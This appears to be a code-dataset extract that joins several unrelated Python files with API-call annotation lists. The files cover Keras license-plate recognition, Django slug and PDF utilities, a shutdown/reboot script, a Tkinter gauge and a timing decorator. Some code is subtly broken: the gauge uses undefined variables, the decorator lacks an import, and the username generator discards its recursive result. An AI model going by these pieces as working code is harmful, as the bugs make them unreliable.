"utility.FeatureGenerator",
"numpy.array"
] |
[((933, 940), 'pydpi.pypro.PyPro', 'PyPro', ([], {}), '()\n', (938, 940), False, 'from pydpi.pypro import PyPro\n'), ((747, 771), 'utility.FeatureGenerator', 'FeatureGenerator', (['smiles'], {}), '(smiles)\n', (763, 771), False, 'from utility import FeatureGenerator\n'), ((605, 630), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (620, 630), False, 'import os\n'), ((1128, 1181), 'numpy.array', 'np.array', (['[f for f in smi_features]'], {'dtype': 'np.float32'}), '([f for f in smi_features], dtype=np.float32)\n', (1136, 1181), True, 'import numpy as np\n'), ((1217, 1251), 'numpy.array', 'np.array', (['(features + smi_features2)'], {}), '(features + smi_features2)\n', (1225, 1251), True, 'import numpy as np\n')]
|
from keras.models import load_model
from keras.preprocessing import image
import numpy as np
import cv2
from keras.backend import tensorflow_backend as K
import os
import glob
import time
import keras
from matplotlib import pyplot as plt
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras import backend as K2
#IOU calc
iou_smooth=1.
#Unet ile plaka bulmak icin gerekli input size'larฤฑ
img_width, img_height = 256, 256
char_list = ["0","1","2","3","4","5","6","7","8","9","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","R","S","T","U","V","Y","Z","X","W"]
#Unet icin gereken loss fonksyonu, kesisen alana gore loss hesaplar
def IOU_calc(y_true, y_pred):
y_true_f = K.flatten(y_true)
y_pred_f = K.flatten(y_pred)
intersection = K.sum(y_true_f * y_pred_f)
return 2*(intersection + iou_smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + iou_smooth)
def IOU_calc_loss(y_true, y_pred):
return 1-IOU_calc(y_true, y_pred)
#Plakadaki karakterlerin sฤฑralanmasฤฑ icin, karakterleri en'lerine bakarak sฤฑralar
def compareRectWidth(a,b):
return a < b
# Unet modeli yukluyor,
model_unet = load_model('../src/gumruk_unetGU002.h5',custom_objects={'IOU_calc_loss': IOU_calc_loss, 'IOU_calc': IOU_calc})
#CNN modelini yukluyor, karakter tanฤฑma icin
# CNN modelinin input sizelarฤฑ
img_rows, img_cols = 28, 28
batch_size = 128
num_classes = 35
epochs = 12
if K2.image_data_format() == 'channels_first':
input_shape = (1, img_rows, img_cols)
else:
input_shape = (img_rows, img_cols, 1)
model_cnn = Sequential()
model_cnn.add(Conv2D(32, kernel_size=(3, 3),
activation='relu',
input_shape=input_shape))
model_cnn.add(Conv2D(64, (3, 3), activation='relu'))
model_cnn.add(MaxPooling2D(pool_size=(2, 2)))
model_cnn.add(Dropout(0.25))
model_cnn.add(Flatten())
model_cnn.add(Dense(128, activation='relu'))
model_cnn.add(Dropout(0.5))
model_cnn.add(Dense(num_classes, activation='softmax'))
model_cnn.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
model_cnn.load_weights('../src/mert_cnn.h5')
#unet ile plakayi bulup, return ediyor. input olarak image path alฤฑyor
def getPlateImage(filepath):
image = cv2.imread(filepath)
plate = image
originalImage = image
##model icin gerekli input boyutunu hazirliyor.
image = cv2.resize(image, (256, 256)).astype("float32")
image = np.expand_dims(image, axis=0)
#prediction binary image dรถnรผyor
pred = model_unet.predict(image)
pred = pred.reshape((256,256,1))
pred = pred.astype(np.float32)
pred = pred*255
pred = cv2.resize(pred, (originalImage.shape[1], originalImage.shape[0]))
pred=np.uint8(pred)
#resimdeki en buyuk beyaz alanฤฑ alฤฑp(plaka lokasyonu) kesiyor
contours, hierarchy = cv2.findContours(pred,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
largestArea = 0
for contour in contours:
tArea = cv2.contourArea(contour)
if tArea > largestArea:
largestArea = tArea
x,y,w,h = cv2.boundingRect(contour)
if largestArea > 0:
plate = originalImage[y:y+h,x:x+w]
else:
print("PLATE COULD NOT FOUND")
return plate
#plaka resmini alฤฑp
def getPlateString(plate):
grayPlate = cv2.cvtColor(plate, cv2.COLOR_BGR2GRAY)
roiList = []
wList = []
charList = []
retval, binary = cv2.threshold(grayPlate, 30.0, 255.0, cv2.THRESH_BINARY+cv2.THRESH_OTSU)
contours,hierarchy = cv2.findContours(binary,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)
idx =0
plateStr = []
for cnt in contours:
idx += 1
x,y,w,h = cv2.boundingRect(cnt)
roi=plate[y:y+h,x:x+w]
if w > 15 and h > 30 and w <100 and h< 100:
roiList.append(roi)
wList.append(x)
#cv2.imwrite("/home/utku/Desktop/rois/" + str(idx) +".jpg", roi)
#cv2.waitKey(100)
#predict roi, resize may needed
#roi = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)
roi = np.asarray(roi)
roi = np.resize(roi, (28,28))
if K2.image_data_format() == 'channels_first':
roi = roi.reshape(roi.shape[0], 1, img_rows, img_cols)
input_shape = (1, img_rows, img_cols)
else:
roi = roi.reshape(1, img_rows, img_cols, 1)
#roi = np.resize(roi, (28,28,1))
#roi = np.expand_dims(roi, axis=0)
roi = roi/255
pred = model_cnn.predict(roi)
#get index
print("pred: ", pred)
predd = pred[0]
char_idx = np.argmax(predd)
#char_idx = np.where(predd == 1) ##1 olanฤฑn indexi
plate_char = char_list[char_idx];
#append result to plateStr, may map the predict to a char(BUT HOW)
plateStr.append(plate_char)
print("plate_char is: ", plate_char)
#break
#sorting from left to right
charList = [x for _,x in sorted(zip(wList,plateStr))]
return charList
#plate = getPlateImage("sampleplate.jpg")
#plateString = getPlateString(plate)
#if 'X' in plateString: plateString.remove('X')
#print("plateString: ", plateString)
|
[
"keras.models.load_model",
"keras.optimizers.Adadelta",
"numpy.resize",
"numpy.argmax",
"keras.backend.tensorflow_backend.flatten",
"cv2.contourArea",
"cv2.cvtColor",
"keras.layers.Flatten",
"cv2.boundingRect",
"keras.layers.MaxPooling2D",
"cv2.resize",
"numpy.uint8",
"keras.layers.Dropout",
"numpy.asarray",
"keras.layers.Conv2D",
"keras.backend.tensorflow_backend.sum",
"keras.backend.image_data_format",
"cv2.threshold",
"numpy.expand_dims",
"cv2.imread",
"keras.layers.Dense",
"keras.models.Sequential",
"cv2.findContours"
] |
[((1228, 1343), 'keras.models.load_model', 'load_model', (['"""../src/gumruk_unetGU002.h5"""'], {'custom_objects': "{'IOU_calc_loss': IOU_calc_loss, 'IOU_calc': IOU_calc}"}), "('../src/gumruk_unetGU002.h5', custom_objects={'IOU_calc_loss':\n IOU_calc_loss, 'IOU_calc': IOU_calc})\n", (1238, 1343), False, 'from keras.models import load_model\n'), ((1643, 1655), 'keras.models.Sequential', 'Sequential', ([], {}), '()\n', (1653, 1655), False, 'from keras.models import Sequential\n'), ((812, 829), 'keras.backend.tensorflow_backend.flatten', 'K.flatten', (['y_true'], {}), '(y_true)\n', (821, 829), True, 'from keras.backend import tensorflow_backend as K\n'), ((842, 859), 'keras.backend.tensorflow_backend.flatten', 'K.flatten', (['y_pred'], {}), '(y_pred)\n', (851, 859), True, 'from keras.backend import tensorflow_backend as K\n'), ((876, 902), 'keras.backend.tensorflow_backend.sum', 'K.sum', (['(y_true_f * y_pred_f)'], {}), '(y_true_f * y_pred_f)\n', (881, 902), True, 'from keras.backend import tensorflow_backend as K\n'), ((1496, 1518), 'keras.backend.image_data_format', 'K2.image_data_format', ([], {}), '()\n', (1516, 1518), True, 'from keras import backend as K2\n'), ((1670, 1744), 'keras.layers.Conv2D', 'Conv2D', (['(32)'], {'kernel_size': '(3, 3)', 'activation': '"""relu"""', 'input_shape': 'input_shape'}), "(32, kernel_size=(3, 3), activation='relu', input_shape=input_shape)\n", (1676, 1744), False, 'from keras.layers import Conv2D, MaxPooling2D\n'), ((1794, 1831), 'keras.layers.Conv2D', 'Conv2D', (['(64)', '(3, 3)'], {'activation': '"""relu"""'}), "(64, (3, 3), activation='relu')\n", (1800, 1831), False, 'from keras.layers import Conv2D, MaxPooling2D\n'), ((1847, 1877), 'keras.layers.MaxPooling2D', 'MaxPooling2D', ([], {'pool_size': '(2, 2)'}), '(pool_size=(2, 2))\n', (1859, 1877), False, 'from keras.layers import Conv2D, MaxPooling2D\n'), ((1893, 1906), 'keras.layers.Dropout', 'Dropout', (['(0.25)'], {}), '(0.25)\n', (1900, 1906), False, 'from keras.layers import Dense, Dropout, Flatten\n'), ((1922, 1931), 'keras.layers.Flatten', 'Flatten', ([], {}), '()\n', (1929, 1931), False, 'from keras.layers import Dense, Dropout, Flatten\n'), ((1947, 1976), 'keras.layers.Dense', 'Dense', (['(128)'], {'activation': '"""relu"""'}), "(128, activation='relu')\n", (1952, 1976), False, 'from keras.layers import Dense, Dropout, Flatten\n'), ((1992, 2004), 'keras.layers.Dropout', 'Dropout', (['(0.5)'], {}), '(0.5)\n', (1999, 2004), False, 'from keras.layers import Dense, Dropout, Flatten\n'), ((2020, 2060), 'keras.layers.Dense', 'Dense', (['num_classes'], {'activation': '"""softmax"""'}), "(num_classes, activation='softmax')\n", (2025, 2060), False, 'from keras.layers import Dense, Dropout, Flatten\n'), ((2371, 2391), 'cv2.imread', 'cv2.imread', (['filepath'], {}), '(filepath)\n', (2381, 2391), False, 'import cv2\n'), ((2547, 2576), 'numpy.expand_dims', 'np.expand_dims', (['image'], {'axis': '(0)'}), '(image, axis=0)\n', (2561, 2576), True, 'import numpy as np\n'), ((2740, 2806), 'cv2.resize', 'cv2.resize', (['pred', '(originalImage.shape[1], originalImage.shape[0])'], {}), '(pred, (originalImage.shape[1], originalImage.shape[0]))\n', (2750, 2806), False, 'import cv2\n'), ((2813, 2827), 'numpy.uint8', 'np.uint8', (['pred'], {}), '(pred)\n', (2821, 2827), True, 'import numpy as np\n'), ((2915, 2977), 'cv2.findContours', 'cv2.findContours', (['pred', 'cv2.RETR_TREE', 'cv2.CHAIN_APPROX_SIMPLE'], {}), '(pred, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n', (2931, 2977), False, 'import cv2\n'), ((3320, 3359), 'cv2.cvtColor', 'cv2.cvtColor', (['plate', 'cv2.COLOR_BGR2GRAY'], {}), '(plate, cv2.COLOR_BGR2GRAY)\n', (3332, 3359), False, 'import cv2\n'), ((3419, 3493), 'cv2.threshold', 'cv2.threshold', (['grayPlate', '(30.0)', '(255.0)', '(cv2.THRESH_BINARY + cv2.THRESH_OTSU)'], {}), '(grayPlate, 30.0, 255.0, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n', (3432, 3493), False, 'import cv2\n'), ((3515, 3579), 'cv2.findContours', 'cv2.findContours', (['binary', 'cv2.RETR_LIST', 'cv2.CHAIN_APPROX_SIMPLE'], {}), '(binary, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n', (3531, 3579), False, 'import cv2\n'), ((2149, 2176), 'keras.optimizers.Adadelta', 'keras.optimizers.Adadelta', ([], {}), '()\n', (2174, 2176), False, 'import keras\n'), ((3030, 3054), 'cv2.contourArea', 'cv2.contourArea', (['contour'], {}), '(contour)\n', (3045, 3054), False, 'import cv2\n'), ((3648, 3669), 'cv2.boundingRect', 'cv2.boundingRect', (['cnt'], {}), '(cnt)\n', (3664, 3669), False, 'import cv2\n'), ((2489, 2518), 'cv2.resize', 'cv2.resize', (['image', '(256, 256)'], {}), '(image, (256, 256))\n', (2499, 2518), False, 'import cv2\n'), ((3117, 3142), 'cv2.boundingRect', 'cv2.boundingRect', (['contour'], {}), '(contour)\n', (3133, 3142), False, 'import cv2\n'), ((3966, 3981), 'numpy.asarray', 'np.asarray', (['roi'], {}), '(roi)\n', (3976, 3981), True, 'import numpy as np\n'), ((3991, 4015), 'numpy.resize', 'np.resize', (['roi', '(28, 28)'], {}), '(roi, (28, 28))\n', (4000, 4015), True, 'import numpy as np\n'), ((4428, 4444), 'numpy.argmax', 'np.argmax', (['predd'], {}), '(predd)\n', (4437, 4444), True, 'import numpy as np\n'), ((946, 961), 'keras.backend.tensorflow_backend.sum', 'K.sum', (['y_true_f'], {}), '(y_true_f)\n', (951, 961), True, 'from keras.backend import tensorflow_backend as K\n'), ((964, 979), 'keras.backend.tensorflow_backend.sum', 'K.sum', (['y_pred_f'], {}), '(y_pred_f)\n', (969, 979), True, 'from keras.backend import tensorflow_backend as K\n'), ((4022, 4044), 'keras.backend.image_data_format', 'K2.image_data_format', ([], {}), '()\n', (4042, 4044), True, 'from keras import backend as K2\n')]
|
import random
import string
import time
from django.utils.text import slugify
from urllib.parse import urlparse
from django.db import models
from django.dispatch import receiver
import uuid
# PDF imports
from io import BytesIO
from django.http import HttpResponse
from django.template.loader import get_template
from xhtml2pdf import pisa
import pdfkit
def random_string_generator(size=4, chars=string.ascii_lowercase + string.digits):
"""[Generates random string]
Args:
size (int, optional): [size of string to generate]. Defaults to 4.
chars ([str], optional): [characters to use]. Defaults to string.ascii_lowercase+string.digits.
Returns:
[str]: [Generated random string]
"""
return ''.join(random.choice(chars) for _ in range(size))
def random_number_generator(size=4, chars='1234567890'):
"""[Generates random number]
Args:
size (int, optional): [size of number to generate]. Defaults to 4.
chars (str, optional): [numbers to use]. Defaults to '1234567890'.
Returns:
[str]: [Generated random number]
"""
return ''.join(random.choice(chars) for _ in range(size))
def simple_random_string():
"""[Generates simple random string]
Returns:
[str]: [Generated random string]
"""
timestamp_m = time.strftime("%Y")
timestamp_d = time.strftime("%m")
timestamp_y = time.strftime("%d")
timestamp_now = time.strftime("%H%M%S")
random_str = random_string_generator()
random_num = random_number_generator()
bindings = (
random_str + timestamp_d + random_num + timestamp_now +
timestamp_y + random_num + timestamp_m
)
return bindings
def simple_random_string_with_timestamp(size=None):
"""[Generates random string with timestamp]
Args:
size ([int], optional): [Size of string]. Defaults to None.
Returns:
[str]: [Generated random string]
"""
timestamp_m = time.strftime("%Y")
timestamp_d = time.strftime("%m")
timestamp_y = time.strftime("%d")
random_str = random_string_generator()
random_num = random_number_generator()
bindings = (
random_str + timestamp_d + timestamp_m + timestamp_y + random_num
)
if not size == None:
return bindings[0:size]
return bindings
def unique_slug_generator(instance, field=None, new_slug=None):
"""[Generates unique slug]
Args:
instance ([Model Class instance]): [Django Model class object instance].
field ([Django Model Field], optional): [Django Model Class Field]. Defaults to None.
new_slug ([str], optional): [passed new slug]. Defaults to None.
Returns:
[str]: [Generated unique slug]
"""
if field == None:
field = instance.title
if new_slug is not None:
slug = new_slug
else:
slug = slugify(field[:50])
Klass = instance.__class__
qs_exists = Klass.objects.filter(slug=slug).exists()
if qs_exists:
new_slug = "{slug}-{randstr}".format(
slug=slug,
randstr=random_string_generator(size=4)
)
return unique_slug_generator(instance, new_slug=new_slug)
return slug
def url_check(url):
"""[Checks if a provided string is URL or Not]
Args:
url ([str]): [URL String]
Returns:
[bool]: [returns True if provided string is URL, otherwise returns False]
"""
min_attr = ('scheme', 'netloc')
try:
result = urlparse(url)
if all([result.scheme, result.netloc]):
return True
else:
return False
except:
return False
def autoUniqueIdWithField(fieldname):
"""[Generates auto slug integrating model's field value and UUID]
Args:
fieldname ([str]): [Model field name to use to generate slug]
"""
def decorator(model):
# some sanity checks first
assert hasattr(model, fieldname), f"Model has no field {fieldname}"
assert hasattr(model, "slug"), "Model is missing a slug field"
@receiver(models.signals.pre_save, sender=model, weak=False)
def generate_unique_id(sender, instance, *args, raw=False, **kwargs):
if not raw and not getattr(instance, fieldname):
source = getattr(instance, fieldname)
def generate():
uuid = random_number_generator(size=12)
Klass = instance.__class__
qs_exists = Klass.objects.filter(uuid=uuid).exists()
if qs_exists:
generate()
else:
instance.uuid = uuid
pass
# generate uuid
generate()
return model
return decorator
def autoslugWithFieldAndUUID(fieldname):
"""[Generates auto slug integrating model's field value and UUID]
Args:
fieldname ([str]): [Model field name to use to generate slug]
"""
def decorator(model):
# some sanity checks first
assert hasattr(model, fieldname), f"Model has no field {fieldname}"
assert hasattr(model, "slug"), "Model is missing a slug field"
@receiver(models.signals.pre_save, sender=model, weak=False)
def generate_slug(sender, instance, *args, raw=False, **kwargs):
if not raw and not instance.slug:
source = getattr(instance, fieldname)
try:
slug = slugify(source)[:123] + "-" + str(uuid.uuid4())
Klass = instance.__class__
qs_exists = Klass.objects.filter(slug=slug).exists()
if qs_exists:
new_slug = "{slug}-{randstr}".format(
slug=slug,
randstr=random_string_generator(size=4)
)
instance.slug = new_slug
else:
instance.slug = slug
except Exception as e:
instance.slug = simple_random_string()
return model
return decorator
def autoslugFromField(fieldname):
"""[Generates auto slug from model's field value]
Args:
fieldname ([str]): [Model field name to use to generate slug]
"""
def decorator(model):
# some sanity checks first
assert hasattr(model, fieldname), f"Model has no field {fieldname!r}"
assert hasattr(model, "slug"), "Model is missing a slug field"
@receiver(models.signals.pre_save, sender=model, weak=False)
def generate_slug(sender, instance, *args, raw=False, **kwargs):
if not raw and not instance.slug:
source = getattr(instance, fieldname)
try:
slug = slugify(source)
Klass = instance.__class__
qs_exists = Klass.objects.filter(slug=slug).exists()
if qs_exists:
new_slug = "{slug}-{randstr}".format(
slug=slug,
randstr=random_string_generator(size=4)
)
instance.slug = new_slug
else:
instance.slug = slug
except Exception as e:
instance.slug = simple_random_string()
return model
return decorator
def autoslugFromUUID():
"""[Generates auto slug using UUID]
"""
def decorator(model):
assert hasattr(model, "slug"), "Model is missing a slug field"
@receiver(models.signals.pre_save, sender=model, weak=False)
def generate_slug(sender, instance, *args, raw=False, **kwargs):
if not raw and not instance.slug:
try:
instance.slug = str(uuid.uuid4())
except Exception as e:
instance.slug = simple_random_string()
return model
return decorator
def generate_unique_username_from_email(instance):
"""[Generates unique username from email]
Args:
instance ([model class object instance]): [model class object instance]
Raises:
ValueError: [If found invalid email]
Returns:
[str]: [unique username]
"""
# get email from instance
email = instance.email
if not email:
raise ValueError("Invalid email!")
def generate_username(email):
return email.split("@")[0][:15] + "__" + simple_random_string_with_timestamp(size=5)
generated_username = generate_username(email=email)
Klass = instance.__class__
qs_exists = Klass.objects.filter(username=generated_username).exists()
if qs_exists:
# recursive call
generate_unique_username_from_email(instance=instance)
return generated_username
def render_to_pdf(template_src, context_dict={}):
"""[summary]
Args:
template_src ([str]): [path of html file to render]
context_dict (dict, optional): [additional contexts]. Defaults to {}.
Returns:
[HttpResponse/None]: [Django HttpResponse object or None]
"""
template = get_template(template_src)
html = template.render(context_dict)
result = BytesIO()
pdf = pisa.pisaDocument(BytesIO(html.encode("ISO-8859-1")), result)
if not pdf.err:
return HttpResponse(result.getvalue(), content_type='application/pdf')
return None
def render_template(template_src, context_dict={}):
"""[summary]
Args:
template_src ([str]): [path of html file to render]
context_dict (dict, optional): [additional contexts]. Defaults to {}.
Returns:
[HttpResponse/None]: [Django HttpResponse object or None]
"""
template = get_template(template_src)
html = template.render(context_dict)
return html
def generate_pdf_with_pdfkit(template_src=None, context=None, options=None, css=[], filename="Download.pdf"):
try:
if not options:
options = {
'page-size': 'Letter',
'margin-top': '0.75in',
'margin-right': '0.75in',
'margin-bottom': '0.75in',
'margin-left': '0.75in',
'encoding': "UTF-8",
'custom-header': [
('Accept-Encoding', 'gzip')
],
'cookie': [
('cookie-empty-value', '""')
],
'no-outline': None
}
template = render_template(template_src=template_src, context_dict=context)
pdf = pdfkit.from_string(
template, options=options, css=css
)
response = HttpResponse(pdf, content_type='application/pdf')
response['Content-Disposition'] = 'attachment; filename="' + filename + '"'
return response
except Exception as E:
return HttpResponse(str(E), content_type='text/plain')
|
[
"io.BytesIO",
"uuid.uuid4",
"django.http.HttpResponse",
"django.dispatch.receiver",
"time.strftime",
"random.choice",
"django.utils.text.slugify",
"pdfkit.from_string",
"urllib.parse.urlparse",
"django.template.loader.get_template"
] |
[((1315, 1334), 'time.strftime', 'time.strftime', (['"""%Y"""'], {}), "('%Y')\n", (1328, 1334), False, 'import time\n'), ((1353, 1372), 'time.strftime', 'time.strftime', (['"""%m"""'], {}), "('%m')\n", (1366, 1372), False, 'import time\n'), ((1391, 1410), 'time.strftime', 'time.strftime', (['"""%d"""'], {}), "('%d')\n", (1404, 1410), False, 'import time\n'), ((1431, 1454), 'time.strftime', 'time.strftime', (['"""%H%M%S"""'], {}), "('%H%M%S')\n", (1444, 1454), False, 'import time\n'), ((1957, 1976), 'time.strftime', 'time.strftime', (['"""%Y"""'], {}), "('%Y')\n", (1970, 1976), False, 'import time\n'), ((1995, 2014), 'time.strftime', 'time.strftime', (['"""%m"""'], {}), "('%m')\n", (2008, 2014), False, 'import time\n'), ((2033, 2052), 'time.strftime', 'time.strftime', (['"""%d"""'], {}), "('%d')\n", (2046, 2052), False, 'import time\n'), ((9260, 9286), 'django.template.loader.get_template', 'get_template', (['template_src'], {}), '(template_src)\n', (9272, 9286), False, 'from django.template.loader import get_template\n'), ((9341, 9350), 'io.BytesIO', 'BytesIO', ([], {}), '()\n', (9348, 9350), False, 'from io import BytesIO\n'), ((9860, 9886), 'django.template.loader.get_template', 'get_template', (['template_src'], {}), '(template_src)\n', (9872, 9886), False, 'from django.template.loader import get_template\n'), ((2861, 2880), 'django.utils.text.slugify', 'slugify', (['field[:50]'], {}), '(field[:50])\n', (2868, 2880), False, 'from django.utils.text import slugify\n'), ((3487, 3500), 'urllib.parse.urlparse', 'urlparse', (['url'], {}), '(url)\n', (3495, 3500), False, 'from urllib.parse import urlparse\n'), ((4063, 4122), 'django.dispatch.receiver', 'receiver', (['models.signals.pre_save'], {'sender': 'model', 'weak': '(False)'}), '(models.signals.pre_save, sender=model, weak=False)\n', (4071, 4122), False, 'from django.dispatch import receiver\n'), ((5266, 5325), 'django.dispatch.receiver', 'receiver', (['models.signals.pre_save'], {'sender': 'model', 'weak': '(False)'}), '(models.signals.pre_save, sender=model, weak=False)\n', (5274, 5325), False, 'from django.dispatch import receiver\n'), ((6604, 6663), 'django.dispatch.receiver', 'receiver', (['models.signals.pre_save'], {'sender': 'model', 'weak': '(False)'}), '(models.signals.pre_save, sender=model, weak=False)\n', (6612, 6663), False, 'from django.dispatch import receiver\n'), ((7692, 7751), 'django.dispatch.receiver', 'receiver', (['models.signals.pre_save'], {'sender': 'model', 'weak': '(False)'}), '(models.signals.pre_save, sender=model, weak=False)\n', (7700, 7751), False, 'from django.dispatch import receiver\n'), ((10718, 10772), 'pdfkit.from_string', 'pdfkit.from_string', (['template'], {'options': 'options', 'css': 'css'}), '(template, options=options, css=css)\n', (10736, 10772), False, 'import pdfkit\n'), ((10823, 10872), 'django.http.HttpResponse', 'HttpResponse', (['pdf'], {'content_type': '"""application/pdf"""'}), "(pdf, content_type='application/pdf')\n", (10835, 10872), False, 'from django.http import HttpResponse\n'), ((743, 763), 'random.choice', 'random.choice', (['chars'], {}), '(chars)\n', (756, 763), False, 'import random\n'), ((1121, 1141), 'random.choice', 'random.choice', (['chars'], {}), '(chars)\n', (1134, 1141), False, 'import random\n'), ((6885, 6900), 'django.utils.text.slugify', 'slugify', (['source'], {}), '(source)\n', (6892, 6900), False, 'from django.utils.text import slugify\n'), ((7932, 7944), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (7942, 7944), False, 'import uuid\n'), ((5581, 5593), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (5591, 5593), False, 'import uuid\n'), ((5547, 5562), 'django.utils.text.slugify', 'slugify', (['source'], {}), '(source)\n', (5554, 5562), False, 'from django.utils.text import slugify\n')]
|
import os
from . import computer
def shutdown():
if computer.os() == "Windows":
os.system("shutdown -s")
elif computer.os() == "Linux":
os.system("shutdown -h")
else:
print("Sistema operacional nao detectado, impossivel executar a operacao desejada")
def reboot():
if computer.os() == "Windows":
os.system("shutdown -r")
elif computer.os() == "Linux":
os.system("shutdown -r")
else:
print("Sistema operacional nao detectado, impossivel executar a operacao desejada")
|
[
"os.system"
] |
[((99, 123), 'os.system', 'os.system', (['"""shutdown -s"""'], {}), "('shutdown -s')\n", (108, 123), False, 'import os\n'), ((358, 382), 'os.system', 'os.system', (['"""shutdown -r"""'], {}), "('shutdown -r')\n", (367, 382), False, 'import os\n'), ((169, 193), 'os.system', 'os.system', (['"""shutdown -h"""'], {}), "('shutdown -h')\n", (178, 193), False, 'import os\n'), ((428, 452), 'os.system', 'os.system', (['"""shutdown -r"""'], {}), "('shutdown -r')\n", (437, 452), False, 'import os\n')]
|
# -*- coding: utf-8 -*-
import Tkinter
import time
from random import randrange
class Mod_gauge(Tkinter.Canvas):
def __init__(self, parent, titre = "Gauge",background="#222735",foreground="#00d0c7", max = 127, min = 0):
global valeur, root, arc, text, H, W, coord1, coord2
self.titre = titre
root = parent
valeur = 0.
H=290
W=260
coord1 = (H-240), (W-215), (H-80), (W-50)
coord2 = (H-270), (W-240), (H-50), (W-20)
Tkinter.Canvas.__init__(self, bg="#FF2E2E", height=H, width=W)
# Dessin de la gauge
self.create_oval(coord1, fill="#FF2E2E", outline="#FF8B8B")
#self.create_oval(coord1, outline="#3399FF")
arc = self.create_arc(coord2, start=90, extent = valeur, fill="#FF8B8B",outline="#FF8B8B")
self.create_oval(coord2, outline="#FF8B8B")
text = self.create_text(130, 130, text=int(valeur), font="Arial 40 italic", fill="#FF8B8B")
legende = self.create_text(130, 260, text= self.titre, font="Arial 20 ", fill="#FF8B8B")
parent.update()
def SetValue(self, consigne):
global valeur, root, arc, text
parent = root
consigne =(entree*100)/self.max
while (int(valeur) != int(consigne*3.6)):
if (int(valeur) < int(consigne*3.6)):
valeur = valeur + 1
txt_consigne = valeur/3.6
self.delete(arc)
self.delete(text)
arc = self.create_arc(coord2, start=90, extent=-valeur, fill="#FF8B8B")
self.create_oval(coord2, outline="#FF8B8B")
self.create_oval(coord1, fill="#FF2E2E", outline="#FF8B8B")
self.create_oval(coord1, outline="#FF8B8B")
text = self.create_text(130, 130, text=int(txt_consigne), font="Arial 40 italic", fill="#FF8B8B")
parent.update()
#time.sleep(0.00002) #Dรฉfinie l'inertie de la gauge
elif( int(valeur) > int(consigne*3.6)):
valeur = valeur - 1
txt_consigne = valeur/3.6
self.delete(arc)
self.delete(text)
arc = self.create_arc(coord2, start=90, extent=-valeur, fill="#FF8B8B")
self.create_oval(coord2, outline="#FF8B8B")
self.create_oval(coord1, fill="#FF2E2E", outline="#FF8B8B")
self.create_oval(coord1, outline="#FF8B8B")
text = self.create_text(130, 130, text=int(txt_consigne), font="Arial 40 italic", fill="#FF8B8B")
parent.update()
#time.sleep(0.00002) #Dรฉfinie l'inertie de la gauge
else :
txt_consigne = valeur/3.6
self.delete(arc)
self.delete(text)
arc = self.create_arc(coord2, start=90, extent=-valeur, fill="#FF8B8B")
self.create_oval(coord2, outline="#FF8B8B")
self.create_oval(coord1, fill="#FF2E2E", outline="#FF8B8B")
self.create_oval(coord1, outline="#FF8B8B")
text = self.create_text(130, 130, text=int(txt_consigne), font="Arial 40 italic", fill="#FF8B8B")
parent.update()
#time.sleep(0.00002) #Dรฉfinie l'inertie de la gauge
def val():
for i in range(1,10):
gauge.SetValue(randrange(100))
if __name__=="__main__":
app=Tkinter.Tk()
gauge=Mod_gauge(app)
gauge.pack()
val()
app.mainloop()
|
[
"Tkinter.Canvas.__init__",
"random.randrange",
"Tkinter.Tk"
] |
[((3430, 3442), 'Tkinter.Tk', 'Tkinter.Tk', ([], {}), '()\n', (3440, 3442), False, 'import Tkinter\n'), ((493, 555), 'Tkinter.Canvas.__init__', 'Tkinter.Canvas.__init__', (['self'], {'bg': '"""#FF2E2E"""', 'height': 'H', 'width': 'W'}), "(self, bg='#FF2E2E', height=H, width=W)\n", (516, 555), False, 'import Tkinter\n'), ((3380, 3394), 'random.randrange', 'randrange', (['(100)'], {}), '(100)\n', (3389, 3394), False, 'from random import randrange\n')]
|
import time
from decimal import Decimal, getcontext
'''
Ways to count execution time:
- time of whole program: $time python3.8 slow_program.py
- too many info: $python3.8 -m cProfile -s time slow_program.py
- direct time measure with Timing Specific Function(via decorator):
'''
def timeit_wrapper(func):
# pylint: disable=E0602
@wraps(func)
def wrapper(*args, **kwargs):
start = time.perf_counter() # Alternatively, you can use time.process_time()
func_return_val = func(*args, **kwargs)
end = time.perf_counter()
print('{0:<10}.{1:<8} : {2:<8}'.format(
func.__module__, func.__name__, end - start))
return func_return_val
return wrapper
# slow_program.py ------------------------------------------------------------------
@timeit_wrapper
def exp(x):
getcontext().prec += 2
i, lasts, s, fact, num = 0, 0, 1, 1, 1
while s != lasts:
lasts = s
i += 1
fact *= i
num *= x
s += num / fact
getcontext().prec -= 2
return +s
print('{0:<10} {1:<8} {2:^8}'.format('module', 'function', 'time'))
exp(Decimal(150))
exp(Decimal(400))
exp(Decimal(3000))
|
[
"decimal.getcontext",
"time.perf_counter",
"decimal.Decimal"
] |
[((1125, 1137), 'decimal.Decimal', 'Decimal', (['(150)'], {}), '(150)\n', (1132, 1137), False, 'from decimal import Decimal, getcontext\n'), ((1143, 1155), 'decimal.Decimal', 'Decimal', (['(400)'], {}), '(400)\n', (1150, 1155), False, 'from decimal import Decimal, getcontext\n'), ((1161, 1174), 'decimal.Decimal', 'Decimal', (['(3000)'], {}), '(3000)\n', (1168, 1174), False, 'from decimal import Decimal, getcontext\n'), ((403, 422), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (420, 422), False, 'import time\n'), ((535, 554), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (552, 554), False, 'import time\n'), ((831, 843), 'decimal.getcontext', 'getcontext', ([], {}), '()\n', (841, 843), False, 'from decimal import Decimal, getcontext\n'), ((1015, 1027), 'decimal.getcontext', 'getcontext', ([], {}), '()\n', (1025, 1027), False, 'from decimal import Decimal, getcontext\n')]
|
from books.models import *
from freezegun import freeze_time
from django.test import TransactionTestCase
from django.test import TestCase
from django.db import DatabaseError, transaction
from books.controllers.customer import Order as SaleOrder
from books.controllers import accountant as acc
from books.controllers import sale
